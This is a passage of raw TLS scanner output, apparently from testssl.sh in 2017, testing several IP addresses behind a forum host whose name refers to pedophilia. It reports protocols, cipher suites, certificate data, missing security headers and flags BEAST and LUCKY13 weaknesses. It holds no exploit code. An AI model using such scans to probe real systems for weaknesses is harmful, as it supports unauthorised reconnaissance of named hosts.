2096 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2097 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2098 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2099 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2100 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2101 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2102
2103
2104[1m[4m Running client simulations via sockets [m
2105
2106 Android 2.3.7 No connection
2107 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2108 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2109 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2110 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2111 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2112 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2113 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2114 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2115 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2116 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2117 IE 6 XP No connection
2118 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2119 IE 8 XP No connection
2120 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2121 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2122 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2123 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2124 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2125 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2126 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2127 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2128 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2129 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
2130 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2131 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2132 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2133 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2134 Java 6u45 No connection
2135 Java 7u25 No connection
2136 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2137 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2138 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2139
2140[7m Done 2017-11-30 00:36:24 [ 403s] -->> 94.23.159.185:443 (pedoforums.omgforum.net) <<--[m
2141
2142-----------------------------------------------------
2143[7m Start 2017-11-30 00:36:27 -->> 94.23.76.111:443 (pedoforums.omgforum.net) <<--[m
2144
2145 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 178.33.44.177
2146 178.33.43.178 178.33.43.150 94.23.150.222
2147 188.165.2.137
2148 rDNS (94.23.76.111): --
2149 Service detected: HTTP
2150
2151
2152[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
2153
2154[1m SSLv2 [m[1;32mnot offered (OK)[m
2155[1m SSLv3 [m[1;32mnot offered (OK)[m
2156[1m TLS 1 [moffered
2157[1m TLS 1.1 [moffered
2158[1m TLS 1.2 [m[1;32moffered (OK)[m
2159[1m TLS 1.3 [mnot offered
2160[1m SPDY/NPN [mnot offered
2161[1m HTTP2/ALPN [mnot offered
2162
2163[1m[4m Testing ~standard cipher categories [m
2164
2165[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
2166[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
2167[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
2168[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
2169[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
2170[1m Triple DES Ciphers (Medium) [mnot offered (OK)
2171[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
2172[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
2173
2174
2175[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2176
2177[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2178 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2179 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2180 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2181 DHE-RSA-AES128-GCM-SHA256
2182[1m Elliptic curves offered: [m[0;32mprime256v1[m
2183
2184
2185[1m[4m Testing server preferences [m
2186
2187[1m Has server cipher order? [m[1;32myes (OK)[m
2188[1m Negotiated protocol [m[1;32mTLSv1.2[m
2189[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2190[1m Cipher order[m
2191 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2192 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2193 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2194 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2195 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2196 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2197
2198
2199[1m[4m Testing server defaults (Server Hello) [m
2200
2201[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2202 "EC point formats/#11" "session ticket/#35"
2203 "heartbeat/#15"
2204[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2205[1m SSL Session ID support [myes
2206[1m Session Resumption [mTickets: yes, ID: yes
2207[1m TLS clock skew[m Random values, no fingerprinting possible
2208[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2209[1m Server key size [mRSA [0;32m4096[m bits
2210[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2211 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2212[1m Common Name (CN) [m[3m*.forumotion.com[m
2213[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2214[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2215[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2216[1m Chain of trust[m [0;32mOk [m[0;35m[m
2217[1m EV cert[m (experimental) no
2218[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2219[1m # of certificates provided[m 2
2220[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2221[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2222[1m OCSP stapling [m[1;33m--[m
2223[1m OCSP must staple [mno
2224[1m DNS CAA RR[m (experimental) [1;33m--[m
2225[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2226
2227
2228[1m[4m Testing HTTP header response @ "/" [m
2229
2230[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2231[1m HTTP clock skew [m0 sec from localtime
2232[1m Strict Transport Security [m--
2233[1m Public Key Pinning [m--
2234[1m Server banner [m(no "Server" line in header, interesting!)
2235[1m Application banner [m--
2236[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2237[1m Security headers [m[0;33m--[m
2238[1m Reverse Proxy banner [m--
2239
2240
2241[1m[4m Testing vulnerabilities [m
2242
2243[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2244[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2245[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2246[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2247[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2248[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2249[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2250[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2251[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2252[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2253[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2254[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2255 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2256 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2257[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2258 but no DH EXPORT ciphers
2259[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2260 DHE-RSA-AES256-SHA [m
2261 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2262[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2263[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2264
2265
2266[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2267
2268Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2269-----------------------------------------------------------------------------------------------------------------------------
2270 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2271 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2272 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2273 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2274 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2275 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2276 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2277 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2278
2279
2280[1m[4m Running client simulations via sockets [m
2281
2282 Android 2.3.7 No connection
2283 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2284 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2285 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2286 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2287 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2288 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2289 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2290 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2291 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2292 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2293 IE 6 XP No connection
2294 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2295 IE 8 XP No connection
2296 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2297 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2298 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2299 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2300 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2301 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2302 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2303 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2304 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2305 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
2306 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2307 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2308 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2309 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2310 Java 6u45 No connection
2311 Java 7u25 No connection
2312 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2313 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2314 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2315
2316[7m Done 2017-11-30 00:39:45 [ 604s] -->> 94.23.76.111:443 (pedoforums.omgforum.net) <<--[m
2317
2318-----------------------------------------------------
2319[7m Start 2017-11-30 00:39:47 -->> 178.33.44.177:443 (pedoforums.omgforum.net) <<--[m
2320
2321 further IP addresses: 178.33.115.32 94.23.73.212 94.23.159.185 94.23.76.111
2322 178.33.43.178 178.33.43.150 94.23.150.222
2323 188.165.2.137
2324 rDNS (178.33.44.177): --
2325 Service detected: HTTP
2326
2327
2328[1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
2329
2330[1m SSLv2 [m[1;32mnot offered (OK)[m
2331[1m SSLv3 [m[1;32mnot offered (OK)[m
2332[1m TLS 1 [moffered
2333[1m TLS 1.1 [moffered
2334[1m TLS 1.2 [m[1;32moffered (OK)[m
2335[1m TLS 1.3 [mnot offered
2336[1m SPDY/NPN [mnot offered
2337[1m HTTP2/ALPN [mnot offered
2338
2339[1m[4m Testing ~standard cipher categories [m
2340
2341[1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
2342[1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
2343[1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
2344[1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
2345[1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
2346[1m Triple DES Ciphers (Medium) [mnot offered (OK)
2347[1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
2348[1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
2349
2350
2351[1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
2352
2353[0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
2354 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2355 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
2356 DHE-RSA-AES256-SHA ECDHE-RSA-AES128-GCM-SHA256
2357 DHE-RSA-AES128-GCM-SHA256
2358[1m Elliptic curves offered: [m[0;32mprime256v1[m
2359
2360
2361[1m[4m Testing server preferences [m
2362
2363[1m Has server cipher order? [m[1;32myes (OK)[m
2364[1m Negotiated protocol [m[1;32mTLSv1.2[m
2365[1m Negotiated cipher [m[1;32mECDHE-RSA-AES256-GCM-SHA384[m, [0;32m256 bit ECDH (P-256)[m
2366[1m Cipher order[m
2367 TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2368 TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA
2369 TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-GCM-SHA256
2370 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES128-GCM-SHA256
2371 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
2372 DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA
2373
2374
2375[1m[4m Testing server defaults (Server Hello) [m
2376
2377[1m TLS extensions (standard) [m"server name/#0" "renegotiation info/#65281"
2378 "EC point formats/#11" "session ticket/#35"
2379 "heartbeat/#15"
2380[1m Session Ticket RFC 5077 hint [m300 seconds, session tickets keys seems to be rotated < daily
2381[1m SSL Session ID support [myes
2382[1m Session Resumption [mTickets: yes, ID: yes
2383[1m TLS clock skew[m Random values, no fingerprinting possible
2384[1m Signature Algorithm [m[0;32mSHA256 with RSA[m
2385[1m Server key size [mRSA [0;32m4096[m bits
2386[1m Fingerprint / Serial [mSHA1 377DB9566D6D36D2D760ABCF6CB77D31862B02FA / 76AEAF53AC4EA0F66625CCF5
2387 SHA256 A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852
2388[1m Common Name (CN) [m[3m*.forumotion.com[m
2389[1m subjectAltName (SAN) [m[3m*.forumotion.com forumotion.com [m
2390[1m Issuer [m[3mAlphaSSL CA - SHA256 - G2[m ([3mGlobalSign nv-sa[m from [3mBE[m)
2391[1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
2392[1m Chain of trust[m [0;32mOk [m[0;35m[m
2393[1m EV cert[m (experimental) no
2394[1m Certificate Expiration [m[0;32m395 >= 60 days[m (2017-11-29 08:03 --> 2018-12-30 08:03 -0500)
2395[1m # of certificates provided[m 2
2396[1m Certificate Revocation List [mhttp://crl2.alphassl.com/gs/gsalphasha2g2.crl
2397[1m OCSP URI [mhttp://ocsp2.globalsign.com/gsalphasha2g2
2398[1m OCSP stapling [m[1;33m--[m
2399[1m OCSP must staple [mno
2400[1m DNS CAA RR[m (experimental) [1;33m--[m
2401[1m Certificate Transparency [m[0;32myes[m (certificate extension)
2402
2403
2404[1m[4m Testing HTTP header response @ "/" [m
2405
2406[1m HTTP Status Code [m 301 Moved Permanently, redirecting to "http://pedoforums.omgforum.net/"[0;31m -- Redirect to insecure URL (NOT ok)[m
2407[1m HTTP clock skew [m0 sec from localtime
2408[1m Strict Transport Security [m--
2409[1m Public Key Pinning [m--
2410[1m Server banner [m(no "Server" line in header, interesting!)
2411[1m Application banner [m--
2412[1m Cookie(s) [m(none issued at "/") -- maybe better try target URL of 30x
2413[1m Security headers [m[0;33m--[m
2414[1m Reverse Proxy banner [m--
2415
2416
2417[1m[4m Testing vulnerabilities [m
2418
2419[1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m
2420[1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
2421[1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m
2422[1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
2423[1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
2424[1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
2425[1m BREACH[m (CVE-2013-3587) [1;32mno HTTP compression (OK) [m - only supplied "/" tested
2426[1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
2427[1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
2428[1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
2429[1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
2430[1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
2431 make sure you don't use this certificate elsewhere with SSLv2 enabled services
2432 https://censys.io/ipv4?q=A367E214DFB9BEF8F166CE57FBFE97D0C8F019B6FDC318A7262341E0DD6CE852 could help you to find out
2433[1m LOGJAM[m (CVE-2015-4000), experimental [1;33mCommon prime with 2048 bits detected: [m[3mhaproxy 1.5 builtin[m,
2434 but no DH EXPORT ciphers
2435[1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES256-SHA
2436 DHE-RSA-AES256-SHA [m
2437 [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2438[1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
2439[1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
2440
2441
2442[1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
2443
2444Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2445-----------------------------------------------------------------------------------------------------------------------------
2446 xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2447 xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2448 xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2449 x9f DHE-RSA-AES256-GCM-SHA384 DH[0;32m 2048[m AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2450 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2451 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2452 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2453 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2454
2455
2456[1m[4m Running client simulations via sockets [m
2457
2458 Android 2.3.7 No connection
2459 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2460 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2461 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2462 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2463 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
2464 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2465 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2466 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2467 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2468 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2469 IE 6 XP No connection
2470 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2471 IE 8 XP No connection
2472 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2473 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2474 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2475 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
2476 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2477 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2478 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2479 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2480 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2481 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
2482 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2483 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2484 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
2485 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
2486 Java 6u45 No connection
2487 Java 7u25 No connection
